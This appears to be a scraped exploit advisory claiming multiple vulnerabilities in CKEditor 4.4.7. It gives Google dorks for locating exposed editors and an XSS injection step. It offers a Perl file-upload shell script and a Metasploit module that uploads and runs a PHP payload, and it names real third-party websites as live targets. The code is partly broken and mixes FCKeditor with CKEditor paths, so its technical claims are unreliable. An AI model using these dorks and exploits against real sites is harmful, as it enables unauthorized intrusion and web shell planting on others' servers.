306 lines (304 sloc) 10.9 KB
########################################### | |
#-----------------------------------------# | |
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# | |
#-----------------------------------------# | |
# *----------------------------* # | |
# K |....##...##..####...####....| . # | |
# h |....#...#........#..#...#...| A # | |
# a |....#..#.........#..#....#..| N # | |
# l |....###........##...#.....#.| S # | |
# E |....#.#..........#..#....#..| e # | |
# D |....#..#.........#..#...#...| u # | |
# . |....##..##...####...####....| r # | |
# *----------------------------* # | |
#-----------------------------------------# | |
#[ Copyright © 2014 | Dz Offenders Cr3w ]# | |
#-----------------------------------------# | |
########################################### | |
# >> D_x . Made In Algeria . x_Z << # | |
###################################################################### | |
# | |
# [>] Title : Ckeditor v4.4.7.xx Multiple Vulnerabilities | |
# | |
# [>] Author : KedAns-Dz | |
# [+] E-mail : ked-h (@hotmail.com) | |
# [+] FaCeb0ok : fb.me/K3d.Dz | |
# [+] TwiTter : @kedans | |
# | |
# [#] Platform : PHP / WebApp | |
# [+] Cat/Tag : File Upload , XSRF-HTML Injection | |
# | |
# [<] <3 b="" greetings="" palestine="" t0="">3> | |
# [>] ^_^ Greetings to 1337day Users/FAN's <3 b="">3> | |
# [-] F-ck Hacking , LuV Exploiting | |
# [!] Vendor : http://ckeditor.com/ | |
# [D] Download : | |
# - http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.4.7/ckeditor_4.4.7_full.zip | |
# | |
####################################################################### | |
# | |
# [!] Description : | |
# | |
# FCKeditor version 4.4.7 is suffer from XSS/HTML Injection and | |
# Other multiple vulnerabilities like File Upload (more ex: see-> | |
# [ http://1337day.com/search?search_request=ckeditor ] | |
# remote attacker can use some CKE files to upload remote file or | |
# Injecting XSS/HTML Codes. | |
# | |
# | |
##### | |
# | |
# [!] Google Dorks : | |
# ------------------ | |
# 1- allinurl:"/ckeditor/samples/plugins/htmlwriter" | |
# 2- allinurl:"/ckeditor/samples/plugins/htmlwriter/outputhtml.html" | |
# 3- allinurl:"/FCKeditor/_samples/php/sample01.php" | |
# 4- allinurl:"/FCKeditor/editor/filemanager/browser/default/browser.html" | |
# 5- allinurl:"/FCKeditor/editor/filemanager" | |
# | |
##### | |
# | |
# [+] Exploit (1) ' XSS/XSRF/HTML Injection ' :=> | |
# ----------------------------------------------- | |
# | |
# - the vuln in htmlwriter plugin : | |
# | |
# > http://[target]/[path]/ckeditor/samples/plugins/htmlwriter/outputhtml.html | |
# | |
# > Edit & Submit you'r Code just it ! | |
# | |
##### | |
# | |
# [+] Exploit (2) ' File Upload ' :=> | |
# ----------------------------------- | |
# REF : http://1337day.com/search?search_request=ckeditor | |
# | |
# +> Use this PERL Script :=> | |
# *********** | |
# #!/usr/bin/perl | |
# | |
# use strict; | |
# use LWP::UserAgent; | |
# use HTTP::Request::Common; | |
# | |
# print < | |
# - CKEditor 4.4.x Arbitrary File Upload Exploit | |
# - Coded By KedAns-Dz | |
# - Contact: ked-h@hotmail.com | |
# - Greetings: 1337day , Dz Offenders , All my Homies | |
# - Copyright (C) 03-2015 - Dz Offenders Cr3w | |
# INTRO | |
# print "Target host and Path: "; | |
# chomp (my $tar= | |
# print "Directory / File / Shell: "; | |
# chomp (my $shell= | |
# | |
# my $a = LWP::UserAgent->new; | |
# my $b = $a->request(POST $tar.'/fckeditor/editor/filemanager/browser/upload/php/upload.php'; | |
# Content_Type => 'form-data', | |
# Content => [ NewFile => $shell ] ); | |
# | |
# if ($b->is_success) { | |
# if (index($b->content, "Disabled") != -1) { print "The webserver is manipulated with your shellcode.\n"; } | |
# else { print "Exploit failed! :(\n"; | |
# } else { print "Not connected with Target!\n"; } | |
# | |
########## | |
# ********* | |
# Or wit' that MSF Exploit :=> | |
# | |
# | |
# require 'msf/core' | |
# | |
# class Metasploit3 < Msf::Exploit::Remote | |
# Rank = ExcellentRanking | |
# | |
# include Msf::Exploit::Remote::HttpClient | |
# | |
# def initialize(info = {}) | |
# super(update_info(info, | |
# 'Name' => 'FCKeditor 4.4.x File Upload Code Execution', | |
# 'Description' => %q{ | |
# This module exploits a vulnerability in the FCK/CKeditor plugin. | |
# By renaming the uploaded file this vulnerability can be used to upload/execute | |
# code on the affected system. | |
# }, | |
# 'Author' => [ 'KedAns-Dz | |
# 'License' => MSF_LICENSE, | |
# 'Version' => '1.0', | |
# 'References' => | |
# [ | |
# ['URL', 'http://1337day.com/search?search_request=ckeditor'], | |
# ], | |
# 'Privileged' => false, | |
# 'Payload' => | |
# { | |
# 'DisableNops' => true, | |
# 'Compat' => | |
# { | |
# 'ConnectionType' => 'find', | |
# }, | |
# 'Space' => 1024, | |
# }, | |
# 'Platform' => 'php', | |
# 'Arch' => ARCH_PHP, | |
# 'Targets' => [[ 'Automatic', { }]], | |
# 'DisclosureDate' => '02/05/2011', | |
# 'DefaultTarget' => 0)) | |
# | |
# register_options( | |
# [ | |
# OptString.new('URI', [true, "CKE Target directory path", "/"]), | |
# ], self.class) | |
# end | |
# | |
# def check | |
# uri = '' | |
# uri << datastore['URI'] | |
# uri << '/' if uri[-1,1] != '/' | |
# uri << 'fckeditor/editor/filemanager/connectors/php/upload.php?Type=File' | |
# res = send_request_raw( | |
# { | |
# 'uri' => uri | |
# }, 25) | |
# | |
# if (res and res.body =~ /sample16.swf/) | |
# return Exploit::CheckCode::Vulnerable | |
# end | |
# | |
# return Exploit::CheckCode::Safe | |
# end | |
# | |
# | |
# def retrieve_obfuscation() | |
# | |
# end | |
# | |
# | |
# def exploit | |
# | |
# cmd_php = '' | |
# | |
# # Generate some random strings | |
# cmdscript = rand_text_alpha_lower(20) | |
# boundary = rand_text_alphanumeric(6) | |
# | |
# # Static files | |
# directory = '/fckeditor/editor/images' | |
# uri_base = '' | |
# uri_base << datastore['URI'] | |
# uri_base << '/' if uri_base[-1,1] != '/' | |
# uri_base << 'fckeditor/editor/filemanager/connectors/php' | |
# | |
# # Get obfuscation code (needed to upload files) | |
# obfuscation_code = nil | |
# | |
# res = send_request_raw({ | |
# 'uri' => uri_base + '/upload.php?Type=File' | |
# }, 25) | |
# | |
# if (res) | |
# | |
# if(res.body =~ /"obfus", "((\w)+)"\)/) | |
# obfuscation_code = $1 | |
# print_status("Successfully retrieved obfuscation code: #{obfuscation_code}") | |
# else | |
# print_error("Error retrieving obfuscation code!") | |
# return | |
# end | |
# end | |
# | |
# # Upload shellcode (file ending .ph.p) | |
# data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n" | |
# data << "#{cmdscript}.ph.p\r\n--#{boundary}" | |
# data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n" | |
# data << "Content-Type: application/octet-stream\r\n\r\n" | |
# data << cmd_php | |
# data << "\r\n--#{boundary}--" | |
# | |
# res = send_request_raw({ | |
# 'uri' => uri_base + "/connector.php?Command=FileUpload&Type=File&CurrentFolder=" + directory + "&obfuscate=#{obfuscation_code}", | |
# 'method' => 'POST', | |
# 'data' => data, | |
# 'headers' => | |
# { | |
# 'Content-Length' => data.length, | |
# 'Content-Type' => 'multipart/form-data; boundary=' + boundary, | |
# } | |
# }, 25) | |
# | |
# if (res and res.body =~ /File Upload Success/) | |
# print_status("Successfully uploaded #{cmdscript}.ph.p") | |
# else | |
# print_error("Error uploading #{cmdscript}.ph.p") | |
# end | |
# | |
# # Complete the upload process (rename file) | |
# print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p") | |
# res = send_request_raw({ | |
# 'uri' => uri_base + '/connector.php?Command=FileUpload&Type=File&CurrentFolder=' + directory + '&filetotal=1' | |
# }) | |
# | |
# # Rename the file from .ph.p to .php | |
# res = send_request_cgi( | |
# { | |
# 'method' => 'POST', | |
# 'uri' => uri_base + '/connector.php?Command=Edit&Type=File&CurrentFolder=', | |
# 'vars_post' => | |
# { | |
# 'actionfile[0]' => "#{cmdscript}.ph.p", | |
# 'renameext[0]' => 'p', | |
# 'renamefile[0]' => "#{cmdscript}.ph", | |
# 'sortby' => 'name', | |
# 'sorttype' => 'asc', | |
# 'showpage' => '0', | |
# 'action' => 'rename', | |
# 'commit' => '', | |
# } | |
# }, 10) | |
# | |
# if (res and res.body =~ /successfully renamed./) | |
# print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php") | |
# else | |
# print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php") | |
# end | |
# | |
# | |
# # Finally call the payload | |
# print_status("Calling payload: #{cmdscript}.php") | |
# uri = '' | |
# uri << datastore['URI'] | |
# uri << '/' if uri[-1,1] != '/' | |
# uri << directory + cmdscript + ".php" | |
# res = send_request_raw({ | |
# 'uri' => uri | |
# }, 25) | |
# | |
# end | |
# | |
# end | |
# | |
# | |
# | |
########### | |
# | |
# Demo's :=> | |
# http://common.beyondindigopets.com/ckeditor/samples/plugins/htmlwriter/outputhtml.html | |
# http://heather.cs.ucdavis.edu/ckeditor/samples/plugins/htmlwriter/outputhtml.html | |
# http://dol-de-bretagne.fr/scripts/FCKeditor/_samples/php/sample01.php | |
# http://tutor.talkbean.com/front/com/FCKeditor/editor/filemanager/browser/default/browser.html | |
# http://www.aseat.fr/fckeditor/editor/filemanager/browser/default/browser.html | |
# Mo in g00glE ;) | |
####################################################################### | |
#### | |
# <! THE END ^_* ! , Good Luck all <3 0-day="" aint="" die="">3> | |
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 b="">3> | |
#--------------------------------------------------------------- | |
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , | |
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, | |
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & | |
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & | |
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & | |
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & | |
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )= | |
#### https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/1503-exploits/ckeditor447-shellxss.txt |
No comments:
Post a Comment